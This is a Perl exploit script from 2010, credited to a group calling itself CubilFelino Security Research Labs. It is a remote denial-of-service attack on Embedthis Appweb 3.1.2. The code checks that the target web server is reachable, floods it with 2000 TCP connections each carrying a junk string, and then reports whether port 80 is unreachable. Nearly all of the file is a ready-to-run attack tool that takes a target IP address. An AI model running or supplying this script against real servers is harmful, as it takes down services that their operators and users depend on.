#!/usr/bin/perl ################################################################################ # # +------------------------------------------------------------------------+ # | ....... | # | ..''xxxxxxxxxxxxxxx'... | # | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxx.. | # | ..'xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'. | # | .'xxxxxxxxxxxxxxxxxxxxxxxxxxxx'''.......'. | # | .'xxxxxxxxxxxxxxxxxxxxx''...... ... .. | # | .xxxxxxxxxxxxxxxxxx'... ........ .'. | # | 'xxxxxxxxxxxxxxx'...... '. | # | 'xxxxxxxxxxxxxx'..'x.. .x. | # | .xxxxxxxxxxxx'...'.. ... .' | # | 'xxxxxxxxx'.. . .. .x. | # | xxxxxxx'. .. x. | # | xxxx'. .... x x. | # | 'x'. ...'xxxxxxx'. x .x. | # | .x'. .'xxxxxxxxxxxxxx. '' .' | # | .xx. .'xxxxxxxxxxxxxxxx. .'xx'''. .' | # | .xx.. 'xxxxxxxxxxxxxxxx' .'xxxxxxxxx''. | # | .'xx'. .'xxxxxxxxxxxxxxx. ..'xxxxxxxxxxxx' | # | .xxx'. .xxxxxxxxxxxx'. .'xxxxxxxxxxxxxx'. | # | .xxxx'.'xxxxxxxxx'. xxx'xxxxxxxxxx'. | # | .'xxxxxxx'.... ...xxxxxxx'. | # | ..'xxxxx'.. ..xxxxx'.. | # | ....'xx'.....''''... | # | | # | CubilFelino Security Research Labs | # | proudly presents... | # +------------------------------------------------------------------------+ # # Embedthis Appweb 3.1.2 Remote DoS # # # Greets: l1l1th (my h4x0r bab3), nitr0us, alt3kx, hkm, r1l0, b0rr3x, w01f, # w0lf47, gh0st, CHiP, corelanc0d3r and all the crew of sectester.net. # ################################################################################ # Exploit Title: Embedthis Appweb 3.1.2 Remote DoS # Date: Mar 12, 2010 # Author: chr1x # Software Link: http://embedthis.com/downloads/index.html # Version: 3.1.2 # Tested on: Windows XP SP3 (Spanish Edition) # st4rt of v00d00 c0d3 XD use HTTP::Lite; use IO::Socket; use locale; if ($#ARGV != 1) { print " ############################################################ CubilFelino Security Labs Embedthis Appweb 3.1.2 Remote DoS by chr1x\@sectester.net ############################################################ Usage: ". $0 ." -h (ip address)\n "; exit; } &main(); sub main { print " ############################################################ CubilFelino Security Labs Embedthis Appweb 3.1.2 Remote DoS by chr1x\@sectester.net ############################################################ "; # Variables $DossedIP = $ARGV[1]; # Execution functions &appWebCheck(); sleep 30; &afterDoS(); } sub appWebCheck { print "[*] Verifying that AppWeb is running at $DossedIP in port 80\n"; my $http = new HTTP::Lite; my $req = $http->request("http://$DossedIP/") or die "[*] Remote address $DossedIP seems not to be up, stopped"; if ($req) { print "[*] w00t! Appweb seems to be running! Sending DoS.. XD\n"; for ($i=1; $i<=2000; $i++) { my $sock = new IO::Socket::INET (PeerAddr => $DossedIP, PeerPort => '80', Proto => 'tcp', Type => SOCK_STREAM,); if ($sock) { print "[*] Sending Connection request Number: $i\n"; print $sock "Die Biatch!"; close($sock); }}}} sub afterDoS { $http = new HTTP::Lite; $req = $http->request("http://$DossedIP/") or die "[*] Webserver DoSsed!! Port 80 is unreacheable now."; }